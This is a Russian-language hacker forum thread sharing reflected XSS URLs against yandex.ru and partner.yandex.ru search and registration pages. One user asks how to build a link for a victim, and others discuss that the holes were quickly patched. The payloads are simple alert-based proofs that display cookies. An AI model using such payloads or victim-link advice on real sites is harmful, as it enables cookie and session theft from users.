Яндекс.Xss

Решил только что в свой чекер уязвимостей для прикола вписать yandex.ru. Вот что получилось
http://yandex.ru/?text="><script>alert(document.cookie)</script>

 

огромная просьба, подскажите, как грамотно составить ссылку для жертвы, используя эту Хss , с меня +

 

Прикрыли лавочку)

 

быстро однако) часа 2 назад ещё работало)))

 

http://www.google.com/search?ie=UTF-8&hl=ru&q=%D1%8F%D0%BD%D0%B4%D0%B5%D0%BA%D1%81%20xss

xss у меня тоже не пашет=\ (опера)

 

увы, уже неактуально((

 

чтот быстро прикрыли

 

http://partner.yandex.ru/registered/?cmd=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&act=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E
Вот вам ещё xss'ка =)

 

не должен быть авторизирован
убери пробелы
вчера работало

 

В осле и мозилле пашет))
В опере жаваскрипт включен, но се равно не фурычит)

 

http://te
st-lo
l.narod.ru/1.JPG

(моя опера)

 

А чем вы на уязвимости чекаете?

 

inv
Какая версия?

 

Если уж так интересно, то вот.

 

9.24

ты просто открой код страницы и найди alert('xss')
и посмотри что там вокруг...==)

 

NOmeR1, это стоило отдельной темы?

add
NOmeR1, а ответить нормально слабо?

 

Сори я пробка. Не разлогинился

 

FeraS=\

freddi
здесь столько бестолковых тем...........тебя именно эта не устроила?
для яндекса можно и создать

 

люди, убедительная просьба. не выкладывайте в паблик такие уязвимости ИХ МОМЕНТАЛЬНО ИЗ-ЗА ВАС ЗАКРЫВАЮТ. подумайте, какой вред вы наносите другим хекерам , которые нашли их до вас...
убедительная просьба к модераторам НЕ УДАЛЯТЬ МОЙ ПОСТ

 

а ты не подумал какой вред хекеры наносят?=)
Захотел выложил,это его право
понятное дело,что обитая только в закрытых разделах,он бы выкладывал только там.